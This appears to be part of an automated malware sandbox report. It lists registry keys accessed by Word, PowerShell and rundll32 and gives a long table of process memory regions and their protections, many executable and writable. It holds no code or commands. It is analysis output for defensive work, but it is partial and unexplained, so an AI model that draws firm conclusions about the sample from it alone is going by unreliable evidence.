SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F536D
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\system32\qagentrt.dll,-10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 337 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1F0000
|
unkown
|
page execute and read and write
|
||
3D0000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
190000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
270000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
390000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
12C000
|
unkown
|
page read and write
|
||
49D000
|
heap default
|
page read and write
|
||
28C4000
|
unkown
|
page read and write
|
||
1DE0000
|
heap private
|
page execute and read and write
|
||
D0000
|
unkown
|
page readonly
|
||
CC8000
|
heap private
|
page read and write
|
||
18C000
|
unkown
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
27EE000
|
unkown
|
page read and write
|
||
1BB2F000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2660000
|
unkown
|
page readonly
|
||
1C72E000
|
unkown
|
page read and write
|
||
1D0F6000
|
unkown
|
page read and write
|
||
243D000
|
unkown
|
page read and write
|
||
2B3E000
|
unkown
|
page read and write | page guard
|
||
10021000
|
unkown
|
page execute and read and write
|
||
850000
|
heap private
|
page read and write
|
||
1FD0000
|
unkown
|
page readonly
|
||
1C8000
|
heap private
|
page read and write
|
||
110000
|
unkown
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
2480000
|
unkown
|
page read and write
|
||
21E0000
|
unkown
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
287D000
|
stack
|
page read and write
|
||
2B90000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
3533000
|
unkown
|
page read and write
|
||
1CC60000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1BCCE000
|
unkown
|
page read and write
|
||
2CEE000
|
unkown
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
20F0000
|
heap private
|
page read and write
|
||
24CD000
|
unkown
|
page read and write
|
||
CAE000
|
stack
|
page read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
1F0000
|
unkown
|
page readonly
|
||
570000
|
unkown
|
page readonly
|
||
1F60000
|
unkown
|
page readonly
|
||
464000
|
heap default
|
page read and write
|
||
510000
|
heap default
|
page read and write
|
||
2B0D000
|
unkown
|
page read and write
|
||
3A0000
|
heap default
|
page read and write
|
||
12D11000
|
unkown
|
page read and write
|
||
4B0000
|
heap default
|
page read and write
|
||
2CD000
|
heap default
|
page read and write
|
||
296D000
|
unkown
|
page read and write
|
||
1D12F000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
38D000
|
heap default
|
page read and write
|
||
28AB000
|
unkown
|
page read and write
|
||
2630000
|
heap private
|
page read and write
|
||
1D126000
|
unkown
|
page read and write
|
||
2BEC000
|
unkown
|
page read and write
|
||
3F1000
|
unkown
|
page execute and read and write
|
||
547000
|
heap default
|
page read and write
|
||
3181000
|
unkown
|
page read and write
|
||
14A000
|
stack
|
page read and write
|
||
1FE7000
|
unkown
|
page readonly
|
||
1F30000
|
unkown
|
page readonly
|
||
23C0000
|
heap private
|
page read and write
|
||
318D000
|
unkown
|
page read and write
|
||
1D134000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
17B000
|
unkown
|
page read and write
|
||
2920000
|
unkown
|
page read and write
|
||
6B0000
|
heap private
|
page read and write
|
||
2760000
|
unkown
|
page readonly
|
||
8F4000
|
heap default
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
2CA0000
|
heap private
|
page read and write
|
||
200000
|
unkown
|
page read and write
|
||
1D0E4000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
1D0FC000
|
unkown
|
page read and write
|
||
354C000
|
unkown
|
page read and write
|
||
377000
|
heap default
|
page read and write
|
||
35C1000
|
unkown
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
1B52D000
|
unkown
|
page read and write
|
||
1B506000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page execute and read and write
|
||
271E000
|
unkown
|
page read and write
|
||
47D000
|
heap default
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
1D253000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
2C7000
|
heap default
|
page read and write
|
||
1F6000
|
unkown
|
page read and write
|
||
1D257000
|
unkown
|
page read and write
|
||
987000
|
heap default
|
page read and write
|
||
271F000
|
stack
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2E5F000
|
stack
|
page read and write
|
||
250000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page write copy
|
||
2035000
|
heap private
|
page read and write
|
||
2634000
|
heap private
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
640000
|
unkown
|
page readonly
|
||
2B4000
|
heap default
|
page read and write
|
||
257000
|
heap default
|
page read and write
|
||
1B538000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1D134000
|
unkown
|
page read and write
|
||
470000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
2D8E000
|
stack
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
7FF000EA000
|
unkown
|
page execute and read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
57E000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
3A0000
|
heap default
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
2880000
|
unkown
|
page readonly
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
2F4000
|
heap default
|
page read and write
|
||
2B8C000
|
unkown
|
page read and write
|
||
5A4000
|
heap default
|
page read and write
|
||
5F2000
|
heap private
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
3504000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
3543000
|
unkown
|
page read and write
|
||
1F8C000
|
unkown
|
page readonly
|
||
1BAF0000
|
heap private
|
page read and write
|
||
1BAF9000
|
heap private
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
7FF00260000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
3F0000
|
unkown
|
page readonly
|
||
5D4000
|
heap private
|
page read and write
|
||
2B80000
|
heap private
|
page execute and read and write
|
||
E0000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page execute and read and write
|
||
27ED000
|
stack
|
page read and write
|
||
1D134000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
3BCE000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
25E4000
|
heap private
|
page read and write
|
||
327000
|
heap default
|
page read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
49D000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
3501000
|
unkown
|
page read and write
|
||
211000
|
unkown
|
page execute and read and write
|
||
340000
|
heap default
|
page read and write
|
||
94F000
|
heap default
|
page read and write
|
||
20AD000
|
stack
|
page read and write
|
||
265F000
|
unkown
|
page read and write
|
||
351A000
|
unkown
|
page read and write
|
||
517000
|
heap default
|
page read and write
|
||
497000
|
heap default
|
page read and write
|
||
340000
|
unkown
|
page write copy
|
||
18C000
|
unkown
|
page read and write
|
||
12C2C000
|
unkown
|
page read and write
|
||
220000
|
heap default
|
page read and write
|
||
1FE7000
|
unkown
|
page readonly
|
||
1EF0000
|
unkown
|
page readonly
|
||
23C0000
|
heap private
|
page read and write
|
||
3549000
|
unkown
|
page read and write
|
||
28D0000
|
unkown
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
1B563000
|
unkown
|
page read and write
|
||
1D0C0000
|
unkown
|
page read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
2C36000
|
unkown
|
page read and write
|
||
3E0000
|
heap private
|
page read and write
|
||
2F0000
|
heap default
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1B4C0000
|
unkown
|
page read and write
|
||
1B5AB000
|
unkown
|
page read and write
|
||
24EF000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7FF0001A000
|
unkown
|
page execute and read and write
|
||
1FE7000
|
unkown
|
page readonly
|
||
1CC73000
|
heap private
|
page read and write
|
||
242000
|
unkown
|
page read and write
|
||
1CC0000
|
unkown
|
page readonly
|
||
8C000
|
stack
|
page read and write
|
||
360000
|
unkown
|
page read and write
|
||
26DE000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
7C0000
|
unkown
|
page readonly
|
||
1D107000
|
unkown
|
page read and write
|
||
500000
|
heap private
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
261000
|
unkown
|
page execute and read and write
|
||
2C45000
|
unkown
|
page read and write
|
||
7FF00112000
|
unkown
|
page execute and read and write
|
||
2CEE000
|
stack
|
page read and write
|
||
27C000
|
unkown
|
page read and write
|
||
3546000
|
unkown
|
page read and write
|
||
1D16C000
|
unkown
|
page read and write
|
||
35C000
|
heap default
|
page read and write
|
||
430000
|
heap default
|
page read and write
|
||
1F74000
|
heap private
|
page read and write
|
||
2030000
|
heap private
|
page read and write
|
||
84E000
|
stack
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
29B0000
|
unkown
|
page read and write
|
||
28CD000
|
unkown
|
page read and write
|
||
275F000
|
stack
|
page read and write
|
||
1E1000
|
unkown
|
page execute and read and write
|
||
4A6000
|
unkown
|
page read and write
|
||
3520000
|
unkown
|
page read and write
|
||
267E000
|
unkown
|
page read and write
|
||
24B0000
|
unkown
|
page read and write
|
||
490000
|
heap default
|
page read and write
|
||
1CE0000
|
unkown
|
page readonly
|
||
1B503000
|
unkown
|
page read and write
|
||
1B595000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
6E0000
|
unkown
|
page readonly
|
||
1D189000
|
unkown
|
page read and write
|
||
7FF0002C000
|
unkown
|
page execute and read and write
|
||
1B571000
|
unkown
|
page read and write
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
600000
|
unkown
|
page readonly
|
||
534000
|
heap default
|
page read and write
|
||
211000
|
unkown
|
page execute and read and write
|
||
1C0000
|
heap private
|
page read and write
|
||
21B0000
|
unkown
|
page readonly
|
||
190000
|
heap default
|
page read and write
|
||
1CD0000
|
heap private
|
page read and write
|
||
12C01000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
236000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1D111000
|
unkown
|
page read and write
|
||
60D000
|
unkown
|
page read and write
|
||
150000
|
heap private
|
page read and write
|
||
357000
|
heap default
|
page read and write
|
||
3357000
|
unkown
|
page read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
372000
|
heap default
|
page read and write
|
||
2660000
|
unkown
|
page readonly
|
||
24B0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
450000
|
unkown
|
page readonly
|
||
1F70000
|
heap private
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
1CA000
|
stack
|
page read and write
|
||
3AE000
|
heap default
|
page read and write
|
||
CC0000
|
heap private
|
page read and write
|
||
6CD000
|
stack
|
page read and write
|
||
25ED000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
495000
|
heap default
|
page read and write
|
||
1B563000
|
unkown
|
page read and write
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
291E000
|
unkown
|
page read and write
|
||
5E1000
|
heap default
|
page read and write
|
||
1D0ED000
|
unkown
|
page read and write
|
||
3507000
|
unkown
|
page read and write
|
||
2150000
|
unkown
|
page readonly
|
||
680000
|
unkown
|
page readonly
|
||
920000
|
heap default
|
page read and write
|
||
2E0000
|
heap private
|
page read and write
|
||
270C000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
2C0000
|
unkown
|
page readonly
|
||
431000
|
heap default
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
3E4000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
188000
|
heap private
|
page read and write
|
||
23C000
|
stack
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
2D5E000
|
unkown
|
page read and write
|
||
28F0000
|
unkown
|
page readonly
|
||
1D134000
|
unkown
|
page read and write
|
||
2C00000
|
unkown
|
page write copy
|
||
140000
|
unkown
|
page read and write
|
||
1B4BD000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
1D122000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
281000
|
unkown
|
page execute and read and write
|
||
1D0F4000
|
unkown
|
page read and write
|
||
265E000
|
stack
|
page read and write
|
||
1F77000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
6BF000
|
stack
|
page read and write
|
||
1D1E8000
|
unkown
|
page read and write
|
||
2E2E000
|
unkown
|
page read and write
|
||
2B50000
|
unkown
|
page write copy
|
||
24C0000
|
unkown
|
page read and write
|
||
32D000
|
heap default
|
page read and write
|
||
5F0000
|
heap private
|
page read and write
|
||
1D253000
|
unkown
|
page read and write
|
||
307000
|
heap default
|
page read and write
|
||
1F50000
|
unkown
|
page readonly
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
5D0000
|
heap private
|
page read and write
|
||
2C01000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
186000
|
unkown
|
page read and write
|
||
3AE000
|
heap default
|
page read and write
|
||
330000
|
heap default
|
page read and write
|
||
860000
|
unkown
|
page readonly
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
12B000
|
unkown
|
page read and write
|
||
54D000
|
heap default
|
page read and write
|
||
340000
|
heap default
|
page read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
1C70000
|
unkown
|
page readonly
|
||
7FF001E7000
|
unkown
|
page read and write
|
||
1B52B000
|
unkown
|
page read and write
|
||
1D129000
|
unkown
|
page read and write
|
||
A00000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
1CEC7000
|
unkown
|
page readonly
|
||
130000
|
unkown
|
page readonly
|
||
450000
|
heap private
|
page read and write
|
||
460000
|
heap default
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
12D71000
|
unkown
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
1EEF000
|
unkown
|
page read and write
|
||
23A0000
|
unkown
|
page readonly
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
370000
|
unkown
|
page write copy
|
||
160000
|
unkown
|
page readonly
|
||
154000
|
heap private
|
page read and write
|
||
35AC000
|
unkown
|
page read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
5C0000
|
unkown
|
page readonly
|
||
3D0000
|
unkown
|
page readonly
|
||
2F0000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
6F0000
|
unkown
|
page readonly
|
||
47C000
|
heap default
|
page read and write
|
||
640000
|
heap private
|
page read and write
|
||
1B538000
|
unkown
|
page read and write
|
||
52E000
|
unkown
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
1D0EF000
|
unkown
|
page read and write
|
||
282E000
|
unkown
|
page read and write
|
||
C0000
|
unkown
|
page execute and read and write
|
||
17C000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
334D000
|
unkown
|
page read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
29E6000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
1BC0000
|
unkown
|
page read and write
|
||
1D0FE000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1B538000
|
unkown
|
page read and write
|
||
2B3F000
|
unkown
|
page read and write
|
||
2F7000
|
heap default
|
page read and write
|
||
1AC60000
|
unkown
|
page read and write
|
||
2A0C000
|
unkown
|
page read and write
|
||
374000
|
heap default
|
page read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
62D000
|
unkown
|
page read and write
|
||
2DAE000
|
stack
|
page read and write
|
||
23D0000
|
unkown
|
page readonly
|
||
90D000
|
heap default
|
page read and write
|
||
660000
|
heap private
|
page read and write
|
||
1AC00000
|
unkown
|
page read and write
|
||
610000
|
unkown
|
page readonly
|
||
150000
|
unkown
|
page readonly
|
||
1D0C7000
|
unkown
|
page read and write
|
||
2FF0000
|
heap private
|
page read and write
|
||
351D000
|
unkown
|
page read and write
|
||
1D164000
|
unkown
|
page read and write
|
||
6E0000
|
unkown
|
page readonly
|
||
62D000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
230000
|
heap default
|
page read and write
|
||
1D163000
|
unkown
|
page read and write
|
||
1B2D0000
|
unkown
|
page read and write
|
||
1B595000
|
unkown
|
page read and write
|
||
6E0000
|
unkown
|
page readonly
|
||
3C0000
|
unkown
|
page readonly
|
||
4A0000
|
unkown
|
page readonly
|
||
2440000
|
unkown
|
page readonly
|
||
467000
|
heap default
|
page read and write
|
||
2A50000
|
heap private
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
260000
|
unkown
|
page read and write
|
||
290000
|
heap default
|
page read and write
|
||
290000
|
heap private
|
page read and write
|
||
3489000
|
unkown
|
page read and write
|
||
5B7000
|
heap default
|
page read and write
|
||
21E0000
|
heap private
|
page read and write
|
||
6C0000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page readonly
|
||
1BC1E000
|
unkown
|
page read and write
|
||
12E50000
|
unkown
|
page read and write
|
||
1A0000
|
heap private
|
page read and write
|
||
1E0000
|
heap private
|
page read and write
|
||
8D0000
|
heap default
|
page read and write
|
||
2970000
|
heap private
|
page read and write
|
||
23BA000
|
unkown
|
page read and write
|
||
1D0F1000
|
unkown
|
page read and write
|
||
2B0000
|
heap private
|
page read and write
|
||
1F5000
|
unkown
|
page read and write | page guard
|
||
620000
|
heap private
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
F4000
|
heap private
|
page read and write
|
||
507000
|
heap private
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
2720000
|
unkown
|
page readonly
|
||
8D7000
|
heap default
|
page read and write
|
||
20B0000
|
unkown
|
page readonly
|
||
1F80000
|
unkown
|
page readonly
|
||
1D0E5000
|
unkown
|
page read and write
|
||
1D156000
|
unkown
|
page read and write
|
||
1E77000
|
unkown
|
page readonly
|
||
7FF000E5000
|
unkown
|
page read and write
|
||
2602000
|
heap private
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
23B5000
|
unkown
|
page read and write
|
||
C0000
|
unkown
|
page execute and read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
29AF000
|
unkown
|
page read and write
|
||
3B20000
|
unkown
|
page read and write
|
||
444000
|
heap default
|
page read and write
|
||
F0000
|
heap private
|
page read and write
|
||
1B59F000
|
unkown
|
page read and write
|
||
1CC000
|
stack
|
page read and write
|
||
860000
|
unkown
|
page readonly
|
||
23C000
|
stack
|
page read and write
|
||
530000
|
heap private
|
page read and write
|
||
25CE000
|
unkown
|
page read and write
|
||
20F0000
|
unkown
|
page read and write
|
||
1B59C000
|
unkown
|
page read and write
|
||
3517000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1BF6000
|
unkown
|
page read and write
|
||
5B0000
|
unkown
|
page readonly
|
||
1D257000
|
unkown
|
page read and write
|
||
2622000
|
heap private
|
page read and write
|
||
2E50000
|
heap private
|
page read and write
|
||
2B8A000
|
heap private
|
page execute and read and write
|
||
4DE000
|
unkown
|
page read and write
|
||
1E57000
|
unkown
|
page readonly
|
||
1FAB000
|
unkown
|
page readonly
|
||
1E60000
|
unkown
|
page read and write
|
||
3536000
|
unkown
|
page read and write
|
||
1D134000
|
unkown
|
page read and write
|
||
60B000
|
heap default
|
page read and write
|
||
870000
|
unkown
|
page readonly
|
||
609000
|
unkown
|
page read and write
|
||
2C2E000
|
unkown
|
page read and write
|
||
7FF00210000
|
unkown
|
page read and write
|
||
1C96E000
|
unkown
|
page read and write
|
||
3B1000
|
unkown
|
page execute and read and write
|
||
1D103000
|
unkown
|
page read and write
|
||
25B0000
|
unkown
|
page readonly
|
||
447000
|
heap default
|
page read and write
|
||
440000
|
heap default
|
page read and write
|
||
343E000
|
unkown
|
page read and write
|
||
350000
|
unkown
|
page readonly
|
||
3187000
|
unkown
|
page read and write
|
||
1D12C000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page read and write
|
||
120000
|
heap private
|
page read and write
|
||
480000
|
heap default
|
page read and write
|
||
24B000
|
unkown
|
page read and write
|
||
274F000
|
unkown
|
page read and write
|
||
96A000
|
heap default
|
page read and write
|
||
230000
|
heap private
|
page read and write
|
||
90000
|
unkown
|
page read and write
|
||
24DF000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
95D000
|
heap default
|
page read and write
|
||
1D0E9000
|
unkown
|
page read and write
|
||
1B970000
|
unkown
|
page read and write
|
||
955000
|
heap default
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
474000
|
heap private
|
page read and write
|
||
1E60000
|
unkown
|
page read and write
|
||
560000
|
heap default
|
page read and write
|
||
1CCE0000
|
unkown
|
page readonly
|
||
2920000
|
unkown
|
page read and write
|
||
484000
|
heap default
|
page read and write
|
||
20D0000
|
unkown
|
page readonly
|
||
7FF000D0000
|
unkown
|
page read and write
|
||
5D0000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
352D000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
1D25E000
|
unkown
|
page read and write
|
||
314000
|
heap default
|
page read and write
|
||
6E0000
|
unkown
|
page readonly
|
||
1D0C3000
|
unkown
|
page read and write
|
||
3530000
|
unkown
|
page read and write
|
||
942000
|
heap default
|
page read and write
|
||
1D0E8000
|
unkown
|
page read and write
|
||
130000
|
unkown
|
page readonly
|
||
2BC0000
|
heap private
|
page execute and read and write
|
||
250000
|
heap private
|
page read and write
|
||
275E000
|
unkown
|
page read and write
|
||
34DB000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
2CFE000
|
unkown
|
page read and write
|
||
350A000
|
unkown
|
page read and write
|
||
1D2C0000
|
unkown
|
page readonly
|
||
1C7DE000
|
unkown
|
page read and write
|
||
6E0000
|
unkown
|
page readonly
|
||
262E000
|
unkown
|
page read and write
|
||
3B3B000
|
unkown
|
page read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
477000
|
heap default
|
page read and write
|
||
2CF0000
|
unkown
|
page write copy
|
||
28C0000
|
unkown
|
page read and write
|
||
25E0000
|
heap private
|
page read and write
|
||
34EB000
|
unkown
|
page read and write
|
||
A57000
|
unkown
|
page readonly
|
||
1F00000
|
unkown
|
page read and write
|
||
26BF000
|
stack
|
page read and write
|
||
2110000
|
heap private
|
page read and write
|
||
490000
|
unkown
|
page readonly
|
||
3000000
|
unkown
|
page readonly
|
||
1D6BC000
|
unkown
|
page read and write
|
||
23A000
|
stack
|
page read and write
|
||
3540000
|
unkown
|
page read and write
|
||
27A0000
|
heap private
|
page read and write
|
||
587000
|
heap default
|
page read and write
|
||
1D123000
|
unkown
|
page read and write
|
||
1D0EC000
|
unkown
|
page read and write
|
||
23B0000
|
unkown
|
page read and write
|
||
1F87000
|
unkown
|
page readonly
|
||
860000
|
unkown
|
page readonly
|
||
1C90000
|
unkown
|
page readonly
|
||
1DD0000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
1E57000
|
unkown
|
page readonly
|
||
231000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1D15C000
|
unkown
|
page read and write
|
||
3A15000
|
unkown
|
page read and write
|
||
387000
|
heap default
|
page read and write
|
||
1CD4000
|
heap private
|
page read and write
|
||
380000
|
unkown
|
page read and write
|
||
1B571000
|
unkown
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
1FB7000
|
unkown
|
page readonly
|
||
1D0D9000
|
unkown
|
page read and write
|
||
1E00000
|
unkown
|
page readonly
|
||
24F4000
|
unkown
|
page read and write
|
||
2604000
|
heap private
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
7FF00150000
|
unkown
|
page read and write
|
||
620000
|
unkown
|
page readonly
|
||
331000
|
heap default
|
page read and write
|
||
7FF00180000
|
unkown
|
page read and write
